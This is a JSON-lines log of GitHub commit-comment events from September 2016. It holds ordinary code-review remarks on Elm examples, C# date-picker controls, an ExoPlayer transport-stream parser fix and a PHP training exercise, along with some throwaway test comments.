{"id":"4538375948","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18958296,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T06:30:26Z","updated_at":"2016-09-09T06:30:26Z","body":"しかしそうだとしたら、下記のコードに従って『データベース接続失敗。』とならないとおかしいですよね？\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18377458/52275166-76a2-11e6-8fd6-74bc82746d48.png)\r\n"}},"created_at":"2016-09-09T06:30:26Z"}
{"id":"4538380521","type":"CommitCommentEvent","actor":{"login":"ForFrog"},"repo":{"name":"Master-Wang/iosched"},"payload":{"comment":{"id":18958301,"position":null,"line":null,"path":null,"commit_id":"21ec19d852e197de9b231966b39b9b233548e721","created_at":"2016-09-09T06:31:50Z","updated_at":"2016-09-09T06:31:50Z","body":"Thanks for the commit. Saved me lots of work"}},"created_at":"2016-09-09T06:31:50Z"}
{"id":"4538381326","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958304,"position":106,"line":106,"path":"examples/example-1.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:32:07Z","updated_at":"2016-09-09T06:32:07Z","body":"Make it more compelling (assuming we're down to one button):\r\n```elm\r\n[ text <| if model.isHovering then \"CAUTION! You may not want to click this.\" else \"\" ]\r\n```"}},"created_at":"2016-09-09T06:32:07Z"}
{"id":"4538382761","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958307,"position":108,"line":108,"path":"examples/example-1.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:32:33Z","updated_at":"2016-09-09T06:32:33Z","body":"Read some place that `text \"\"` becomes a no-op in vdom. "}},"created_at":"2016-09-09T06:32:33Z"}
{"id":"4538383824","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958310,"position":113,"line":113,"path":"examples/example-1.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:32:53Z","updated_at":"2016-09-09T06:32:53Z","body":"Maybe lose this; the hovering example is enough. "}},"created_at":"2016-09-09T06:32:53Z"}
{"id":"4538385975","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958315,"position":81,"line":81,"path":"examples/example-1.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:33:39Z","updated_at":"2016-09-09T06:33:39Z","body":"If we are down to one button anyway, maybe make a single message `SetHover Bool` instead of the two `Mouse*` messages."}},"created_at":"2016-09-09T06:33:39Z"}
{"id":"4538386127","type":"CommitCommentEvent","actor":{"login":"zzwna"},"repo":{"name":"zzwna/IFE-Task"},"payload":{"comment":{"id":18958316,"position":4,"line":4,"path":"task1.html","commit_id":"46435b8ea21fabb94a5f0d9cf52f85399ae3c38a","created_at":"2016-09-09T06:33:42Z","updated_at":"2016-09-09T06:33:42Z","body":"<title>\r\n  简单网页练习\r\n</title>"}},"created_at":"2016-09-09T06:33:42Z"}
{"id":"4538386293","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":18958317,"position":null,"line":null,"path":null,"commit_id":"daabb6bce833c27f1b253a8a25fad4f0d71c0d7c","created_at":"2016-09-09T06:33:46Z","updated_at":"2016-09-09T06:33:46Z","body":"another comment to verify payload"}},"created_at":"2016-09-09T06:33:46Z"}
{"id":"4538388383","type":"CommitCommentEvent","actor":{"login":"tallandtree"},"repo":{"name":"jfpineau/ferment"},"payload":{"comment":{"id":18958323,"position":null,"line":null,"path":null,"commit_id":"15fb890ffc3301544fdd0e66260fd58fe1f645aa","created_at":"2016-09-09T06:34:30Z","updated_at":"2016-09-09T06:34:30Z","body":"Hi, I had the same problem but am thinking of a different fix (as well as to add to the template a check if port_bindings is not null). I believe it is caused because of: https://github.com/docker/docker-py/issues/1193.  So, script.py should be fixed as well. "}},"created_at":"2016-09-09T06:34:30Z"}
{"id":"4538388600","type":"CommitCommentEvent","actor":{"login":"wind0304598"},"repo":{"name":"wind0304598/TestNotifyWithSlack"},"payload":{"comment":{"id":18958324,"position":null,"line":null,"path":null,"commit_id":"7c67c87bad3fd3ac3769d6b6d5ff02b9596ad19c","created_at":"2016-09-09T06:34:35Z","updated_at":"2016-09-09T06:34:35Z","body":"hello"}},"created_at":"2016-09-09T06:34:35Z"}
{"id":"4538390215","type":"CommitCommentEvent","actor":{"login":"wind0304598"},"repo":{"name":"wind0304598/TestNotifyWithSlack"},"payload":{"comment":{"id":18958326,"position":null,"line":null,"path":null,"commit_id":"7c67c87bad3fd3ac3769d6b6d5ff02b9596ad19c","created_at":"2016-09-09T06:35:08Z","updated_at":"2016-09-09T06:35:08Z","body":"bello"}},"created_at":"2016-09-09T06:35:08Z"}
{"id":"4538390884","type":"CommitCommentEvent","actor":{"login":"MRebhan"},"repo":{"name":"BeetoGuy/BetterWithMods"},"payload":{"comment":{"id":18958328,"position":null,"line":null,"path":null,"commit_id":"91acd0b7e20cc583ca5205c699150bdac5fda62f","created_at":"2016-09-09T06:35:20Z","updated_at":"2016-09-09T06:35:20Z","body":"You also need to play the breaking sound in the goUp() method!"}},"created_at":"2016-09-09T06:35:20Z"}
{"id":"4538391867","type":"CommitCommentEvent","actor":{"login":"wind0304598"},"repo":{"name":"wind0304598/TestNotifyWithSlack"},"payload":{"comment":{"id":18958329,"position":null,"line":null,"path":null,"commit_id":"7c67c87bad3fd3ac3769d6b6d5ff02b9596ad19c","created_at":"2016-09-09T06:35:38Z","updated_at":"2016-09-09T06:35:38Z","body":"123\r\n321\r\n1234567\r\n我們是快樂的攻城獅"}},"created_at":"2016-09-09T06:35:38Z"}
{"id":"4538391951","type":"CommitCommentEvent","actor":{"login":"minn0108"},"repo":{"name":"wind0304598/TestNotifyWithSlack"},"payload":{"comment":{"id":18958330,"position":null,"line":null,"path":null,"commit_id":"7c67c87bad3fd3ac3769d6b6d5ff02b9596ad19c","created_at":"2016-09-09T06:35:40Z","updated_at":"2016-09-09T06:35:40Z","body":"hehe"}},"created_at":"2016-09-09T06:35:40Z"}
{"id":"4538393146","type":"CommitCommentEvent","actor":{"login":"minn0108"},"repo":{"name":"wind0304598/TestNotifyWithSlack"},"payload":{"comment":{"id":18958334,"position":null,"line":null,"path":null,"commit_id":"7c67c87bad3fd3ac3769d6b6d5ff02b9596ad19c","created_at":"2016-09-09T06:36:06Z","updated_at":"2016-09-09T06:36:06Z","body":"@wind0304598 \r\n"}},"created_at":"2016-09-09T06:36:06Z"}
{"id":"4538393674","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958335,"position":5,"line":5,"path":"examples/elm-package.json","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:36:16Z","updated_at":"2016-09-09T06:36:16Z","body":"Apache?"}},"created_at":"2016-09-09T06:36:16Z"}
{"id":"4538397640","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958346,"position":28,"line":28,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:37:36Z","updated_at":"2016-09-09T06:37:36Z","body":"Consider dropping the clickCount, the `focused` bit is enough. "}},"created_at":"2016-09-09T06:37:36Z"}
{"id":"4538397905","type":"CommitCommentEvent","actor":{"login":"gty19950420"},"repo":{"name":"gty19950420/lol"},"payload":{"comment":{"id":18958347,"position":null,"line":null,"path":null,"commit_id":"9cc5b10125584216dcbb2db70e6293a64ccbf6fa","created_at":"2016-09-09T06:37:41Z","updated_at":"2016-09-09T06:37:41Z","body":"0"}},"created_at":"2016-09-09T06:37:41Z"}
{"id":"4538400166","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958355,"position":54,"line":54,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:38:26Z","updated_at":"2016-09-09T06:38:26Z","body":"Maybe call it `Option`, which is slightly more descriptive. "}},"created_at":"2016-09-09T06:38:26Z"}
{"id":"4538403719","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":18958364,"position":null,"line":null,"path":null,"commit_id":"caf218ce4b110d8e65732f6c241f448a818a9b1f","created_at":"2016-09-09T06:39:36Z","updated_at":"2016-09-09T06:39:36Z","body":"与 antd-mobile 一致"}},"created_at":"2016-09-09T06:39:36Z"}
{"id":"4538405299","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":18958368,"position":null,"line":null,"path":null,"commit_id":"934fc6c78baef9221eb1104beaaf8e7f122dcb1f","created_at":"2016-09-09T06:40:09Z","updated_at":"2016-09-09T06:40:09Z","body":":+1:"}},"created_at":"2016-09-09T06:40:09Z"}
{"id":"4538405634","type":"CommitCommentEvent","actor":{"login":"kszaq"},"repo":{"name":"wrxtasy/LibreELEC.tv.7.0"},"payload":{"comment":{"id":18958370,"position":null,"line":null,"path":null,"commit_id":"34802639f5990d26eafb9aebede0d310e1957aab","created_at":"2016-09-09T06:40:15Z","updated_at":"2016-09-09T06:40:15Z","body":"There may be an issue with 7.1 channel mapping, details in comment to LE PR: https://github.com/LibreELEC/LibreELEC.tv/pull/709#issuecomment-245832258"}},"created_at":"2016-09-09T06:40:15Z"}
{"id":"4538407348","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958375,"position":61,"line":61,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:40:49Z","updated_at":"2016-09-09T06:40:49Z","body":"Examples should be as short as possible. Lose `on` and `onClick`."}},"created_at":"2016-09-09T06:40:49Z"}
{"id":"4538408964","type":"CommitCommentEvent","actor":{"login":"johnmontewhat"},"repo":{"name":"shellTeam/ShellApp"},"payload":{"comment":{"id":18958377,"position":5,"line":63,"path":"Shell-Revelry/QR.swift","commit_id":"8807b4a51bda077dc710e619cb10d26b9dedb5d2","created_at":"2016-09-09T06:41:22Z","updated_at":"2016-09-09T06:41:22Z","body":"Good Idea!!!"}},"created_at":"2016-09-09T06:41:22Z"}
{"id":"4538411246","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958379,"position":9,"line":86,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DateTimePicker/Views/DateTimePickerControl.xaml","commit_id":"b8422925598e470c735da8c7c2e08f208a9ba31b","created_at":"2016-09-09T06:42:09Z","updated_at":"2016-09-09T06:42:09Z","body":"Why this \"Link\"? Most converters in Catel support the ConverterParameter to invert the behavior."}},"created_at":"2016-09-09T06:42:09Z"}
{"id":"4538411694","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18958380,"position":null,"line":null,"path":null,"commit_id":"b55fd328c79158a5f4f5f2b432a129f3e4cff0c2","created_at":"2016-09-09T06:42:17Z","updated_at":"2016-09-09T06:42:17Z","body":"@houkanshan 也对，主界面的屏幕也显示不了多少字。就在最后一个加工步骤完成后出现文本框提示请取出物品就行了。然后在完成阶段时，鼠标在入口舱区域显示成not-allowed样式，同理，在开始阶段时，鼠标在出口舱区域时也是not-allowed样式，正好也体现机器的自动锁死自制。"}},"created_at":"2016-09-09T06:42:17Z"}
{"id":"4538412369","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958383,"position":99,"line":99,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:42:31Z","updated_at":"2016-09-09T06:42:31Z","body":"I don't think a comment is necessary here. The one you've got is slightly confusing. (It's a message, and Dispatch doesn't know about it.)\r\n\r\nAlso, consider using a different name. The module is already called `Dispatch`, which might confuse someone. `Events`, `Forward`, or `Batch`, maybe?"}},"created_at":"2016-09-09T06:42:31Z"}
{"id":"4538414838","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958396,"position":137,"line":137,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:43:24Z","updated_at":"2016-09-09T06:43:24Z","body":"\"user-provided\""}},"created_at":"2016-09-09T06:43:24Z"}
{"id":"4538415636","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958403,"position":138,"line":138,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:43:39Z","updated_at":"2016-09-09T06:43:39Z","body":"Also, maybe be precise and say \"event-handlers\" rather than \"events\"."}},"created_at":"2016-09-09T06:43:39Z"}
{"id":"4538416163","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958407,"position":129,"line":129,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:43:49Z","updated_at":"2016-09-09T06:43:49Z","body":"Good."}},"created_at":"2016-09-09T06:43:49Z"}
{"id":"4538416406","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":18958408,"position":null,"line":null,"path":null,"commit_id":"166281ae05b23ca51add94ebab7599717eaa2e5d","created_at":"2016-09-09T06:43:55Z","updated_at":"2016-09-09T06:43:55Z","body":"test comment"}},"created_at":"2016-09-09T06:43:55Z"}
{"id":"4538417054","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958411,"position":15,"line":34,"path":"src/Orc.Controls.Examples/ViewModels/DatePickerViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T06:44:10Z","updated_at":"2016-09-09T06:44:10Z","body":"Maybe it's better for consistency to use the real commands we use everywhere (with a OnSetNullExecute, etc). I know it might look a bit much, but I think in this case consistency > verbosibility."}},"created_at":"2016-09-09T06:44:10Z"}
{"id":"4538417580","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18958412,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T06:44:18Z","updated_at":"2016-09-09T06:44:18Z","body":"おお、このエラーがでているのですね。これは異常ですね。\r\n\r\n失礼いたしました。申し訳ないです。\r\n\r\n上のコメント内で書いた通りコードの動作確認はこれからなので確認後に返信いたしますね！"}},"created_at":"2016-09-09T06:44:18Z"}
{"id":"4538419751","type":"CommitCommentEvent","actor":{"login":"lhpopov"},"repo":{"name":"lhpopov/AddSense.js"},"payload":{"comment":{"id":18958418,"position":null,"line":null,"path":null,"commit_id":"59da058d5c94b95c839c950bd25daf45d6282405","created_at":"2016-09-09T06:44:59Z","updated_at":"2016-09-09T06:44:59Z","body":"You are right, no need for that long names. Fixed it and also added language option to the README file."}},"created_at":"2016-09-09T06:44:59Z"}
{"id":"4538421415","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958422,"position":5,"line":24,"path":"src/Orc.Controls.Examples/Views/TimeSpan.xaml","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T06:45:32Z","updated_at":"2016-09-09T06:45:32Z","body":"Don't we want the HideSeconds on the TimeSpan control as well?"}},"created_at":"2016-09-09T06:45:32Z"}
{"id":"4538422567","type":"CommitCommentEvent","actor":{"login":"steemer3505"},"repo":{"name":"steemer3505/mike"},"payload":{"comment":{"id":18958424,"position":11,"line":11,"path":".gitignore","commit_id":"465373a93f2aaa78f57a9d35e6823e340c8c478c","created_at":"2016-09-09T06:45:54Z","updated_at":"2016-09-09T06:45:54Z","body":"M"}},"created_at":"2016-09-09T06:45:54Z"}
{"id":"4538422778","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958426,"position":14,"line":18,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/ViewModels/DatePickerViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T06:45:59Z","updated_at":"2016-09-09T06:45:59Z","body":"What is cd?"}},"created_at":"2016-09-09T06:45:59Z"}
{"id":"4538426191","type":"CommitCommentEvent","actor":{"login":"tresvecesseis"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":18958432,"position":92,"line":506,"path":"library/src/main/java/com/google/android/exoplayer2/extractor/ts/TsExtractor.java","commit_id":"520e6caa60b06a06a114ab89a9d095dcb6773b9f","created_at":"2016-09-09T06:47:03Z","updated_at":"2016-09-09T06:47:03Z","body":"@AquilesCanta I think this breaks (we miss the rest of pending descriptors) when we find a REGISTRATION descriptor before the ISO639_LANG one, we could change it to:\r\n```java\r\n-      while (data.getPosition() < descriptorsEndPosition) {\r\n+      int descriptorStartPosition;\r\n+      while ((descriptorStartPosition = data.getPosition()) < descriptorsEndPosition) {\r\n```\r\n\r\nremove the break at the REGISTRATION descriptor processing and change the end of the loop to:\r\n```java\r\n-        data.skipBytes(descriptorLength);\r\n+        data.setPosition(descriptorStartPosition + descriptorLength + 2);\r\n```\r\n\r\nwhat do you think?\r\n"}},"created_at":"2016-09-09T06:47:03Z"}
{"id":"4538429903","type":"CommitCommentEvent","actor":{"login":"tammoterhark"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18958446,"position":null,"line":null,"path":null,"commit_id":"0d3186860c46497d24aa8c4d7bade2ed66d1f178","created_at":"2016-09-09T06:48:13Z","updated_at":"2016-09-09T06:48:13Z","body":"Thank you!"}},"created_at":"2016-09-09T06:48:13Z"}
{"id":"4538430012","type":"CommitCommentEvent","actor":{"login":"JongsooKim"},"repo":{"name":"JongsooKim/dgist-git"},"payload":{"comment":{"id":18958447,"position":null,"line":null,"path":null,"commit_id":"2bf0cd327202dc404bdfc0b1480039fca6a5838d","created_at":"2016-09-09T06:48:16Z","updated_at":"2016-09-09T06:48:16Z","body":"오"}},"created_at":"2016-09-09T06:48:16Z"}
{"id":"4538431777","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958451,"position":125,"line":246,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T06:48:49Z","updated_at":"2016-09-09T06:48:49Z","body":"Please rename to OnSelectDateButtonClick"}},"created_at":"2016-09-09T06:48:49Z"}
{"id":"4538431912","type":"CommitCommentEvent","actor":{"login":"Divran"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":18958453,"position":null,"line":null,"path":null,"commit_id":"8416c3ef736264e434c20a918c3c1b31aae0adfd","created_at":"2016-09-09T06:48:51Z","updated_at":"2016-09-09T06:48:51Z","body":"what the shit I checked the diff before merging and that change wasn't there"}},"created_at":"2016-09-09T06:48:51Z"}
{"id":"4538431915","type":"CommitCommentEvent","actor":{"login":"OskarStark"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18958452,"position":null,"line":null,"path":null,"commit_id":"e12f8bfe51ebbc18d9ef8b18d427d4b4a54a8ee5","created_at":"2016-09-09T06:48:51Z","updated_at":"2016-09-09T06:48:51Z","body":"@peshi could you provide a PR?"}},"created_at":"2016-09-09T06:48:51Z"}
{"id":"4538435427","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958463,"position":162,"line":317,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T06:50:00Z","updated_at":"2016-09-09T06:50:00Z","body":"Why check for newValue == null? Shouldn't we always just apply the value?"}},"created_at":"2016-09-09T06:50:00Z"}
{"id":"4538440561","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958472,"position":250,"line":272,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DateTimePicker/ViewModels/DateTimePickerViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T06:51:42Z","updated_at":"2016-09-09T06:51:42Z","body":"Why invariant? Why not using CultureInfo.CurrentCulture?"}},"created_at":"2016-09-09T06:51:42Z"}
{"id":"4538441603","type":"CommitCommentEvent","actor":{"login":"sandy081"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18958473,"position":12,"line":12,"path":"src/vs/workbench/common/editor/rangeDecorations.ts","commit_id":"24743e881dd222545a02bd22d1b21fcc89296164","created_at":"2016-09-09T06:52:03Z","updated_at":"2016-09-09T06:52:03Z","body":"@bpasero Thanks for pointing this doc, I am not aware of this dependency rule. I took this check from an another place. I would also fix there. \r\n\r\nThis looks good to me."}},"created_at":"2016-09-09T06:52:03Z"}
{"id":"4538442949","type":"CommitCommentEvent","actor":{"login":"tammoterhark"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18958475,"position":null,"line":null,"path":null,"commit_id":"8dc0e65845ef2e7c49851004717b06b5b975c33f","created_at":"2016-09-09T06:52:29Z","updated_at":"2016-09-09T06:52:29Z","body":"OK, now I see that much deeper in the system also classes are being set. Strange actually: I would think that that should be part of the templating system.... In my idea setting classes is something that belongs to the front end."}},"created_at":"2016-09-09T06:52:29Z"}
{"id":"4538445014","type":"CommitCommentEvent","actor":{"login":"Ntemis"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":18958480,"position":null,"line":null,"path":null,"commit_id":"083ef3fefecd024b2b9cdc496e1f7811c225041e","created_at":"2016-09-09T06:53:10Z","updated_at":"2016-09-09T06:53:10Z","body":"W25Q128 is a 16mb Spi flash not 8 :)"}},"created_at":"2016-09-09T06:53:10Z"}
{"id":"4538446203","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958481,"position":125,"line":299,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DateTimePicker/Views/DateTimePickerControl.xaml.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T06:53:32Z","updated_at":"2016-09-09T06:53:32Z","body":"Not sure how \"expensive\" a call to dateTime.Value is, otherwhise we could store the result in a variable."}},"created_at":"2016-09-09T06:53:32Z"}
{"id":"4538447009","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958484,"position":140,"line":140,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:53:47Z","updated_at":"2016-09-09T06:53:47Z","body":"The `config` and `attributes` definitions looks difficult on first glance. I'd suggest factoring them out in a `collect` or `attributes` function, which users can copy-paste into their own code if they think its a good idea. \r\n\r\n```elm\r\nattributes : List (Property msg) -> List (Attributes msg)\r\nattributes props = \r\n  let (attrs, handlers) = \r\n    List.foldl toAttr \r\n      (Dispatch.setMsg (Dispatch >> lift) Dispatch.defaultConfig)\r\n      props\r\n  in\r\n    attrs ++ handlers    -- (Production code would avoid the `++`)\r\n\r\n\r\ntoAttr prop (attrs, handlers) = \r\n  case prop of \r\n    Decoder evt d -> \r\n      (attrs, Dispatch.add evt Nothing d handlers)\r\n    \r\n    Any attr -> \r\n      (attr :: attrs, handlers)\r\n```\r\n\r\n"}},"created_at":"2016-09-09T06:53:47Z"}
{"id":"4538448564","type":"CommitCommentEvent","actor":{"login":"twinj"},"repo":{"name":"vporoshok/uuid"},"payload":{"comment":{"id":18958486,"position":null,"line":null,"path":null,"commit_id":"572c2fc5a96f052826a1c767b1ea3d85aba774a0","created_at":"2016-09-09T06:54:17Z","updated_at":"2016-09-09T06:54:17Z","body":"Seems reasonable. Thanks for doing the fix. "}},"created_at":"2016-09-09T06:54:17Z"}
{"id":"4538448576","type":"CommitCommentEvent","actor":{"login":"OskarStark"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18958487,"position":null,"line":null,"path":null,"commit_id":"d7e1f2f89228291acb0a5fcf9db02810ca7f6716","created_at":"2016-09-09T06:54:17Z","updated_at":"2016-09-09T06:54:17Z","body":"I added a PR here: https://github.com/FriendsOfSymfony/FOSUserBundle/pull/2216"}},"created_at":"2016-09-09T06:54:17Z"}
{"id":"4538449047","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":18958488,"position":null,"line":null,"path":null,"commit_id":"ffeb454947f4549492784871b5ddb1824399b58a","created_at":"2016-09-09T06:54:25Z","updated_at":"2016-09-09T06:54:25Z","body":"Test 1"}},"created_at":"2016-09-09T06:54:25Z"}
{"id":"4538449940","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18958491,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T06:54:43Z","updated_at":"2016-09-09T06:54:43Z","body":"すみません、宜しくお願い申し上げます！"}},"created_at":"2016-09-09T06:54:43Z"}
{"id":"4538452973","type":"CommitCommentEvent","actor":{"login":"arunmoezhi"},"repo":{"name":"arunmoezhi/ConcurrentTreeMap"},"payload":{"comment":{"id":18958495,"position":12,"line":12,"path":"src/ConcurrentTreeMap.h","commit_id":"cac98c455327885d19c60eb56866efb34b28bf33","created_at":"2016-09-09T06:55:42Z","updated_at":"2016-09-09T06:55:42Z","body":"(K, V) same as in Node's template works fine with intel compiler but not with others"}},"created_at":"2016-09-09T06:55:42Z"}
{"id":"4538456840","type":"CommitCommentEvent","actor":{"login":"Adirelle"},"repo":{"name":"Rainrider/AdiButtonAuras"},"payload":{"comment":{"id":18958505,"position":6,"line":20,"path":".travis.yml","commit_id":"6eb093e831fa912278fed7a9246660aebb2bb7a1","created_at":"2016-09-09T06:56:46Z","updated_at":"2016-09-09T06:56:46Z","body":"Why \"before\" script ? It is a test by itself, it can be the first script."}},"created_at":"2016-09-09T06:56:46Z"}
{"id":"4538457332","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":18958506,"position":null,"line":null,"path":null,"commit_id":"ffeb454947f4549492784871b5ddb1824399b58a","created_at":"2016-09-09T06:56:54Z","updated_at":"2016-09-09T06:56:54Z","body":"Test 2"}},"created_at":"2016-09-09T06:56:54Z"}
{"id":"4538457818","type":"CommitCommentEvent","actor":{"login":"OskarStark"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18958509,"position":null,"line":null,"path":null,"commit_id":"e12f8bfe51ebbc18d9ef8b18d427d4b4a54a8ee5","created_at":"2016-09-09T06:57:02Z","updated_at":"2016-09-09T06:57:02Z","body":"I added the missing `@Event()` annotations https://github.com/FriendsOfSymfony/FOSUserBundle/pull/2216\r\n\r\n"}},"created_at":"2016-09-09T06:57:02Z"}
{"id":"4538460297","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958514,"position":205,"line":205,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:57:46Z","updated_at":"2016-09-09T06:57:46Z","body":"Maybe leave out the change in outline, which makes the surrounding text jump on hover. "}},"created_at":"2016-09-09T06:57:46Z"}
{"id":"4538460428","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958516,"position":200,"line":200,"path":"examples/FancyButton.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:57:49Z","updated_at":"2016-09-09T06:57:49Z","body":"Maybe `hover`? We're not actually focused. \r\n\r\nAlso, to make this example not doable exclusively by CSS, consider changing the color a bit on each hover. (So everytime you hover, the button background turns a bit darker.)"}},"created_at":"2016-09-09T06:57:49Z"}
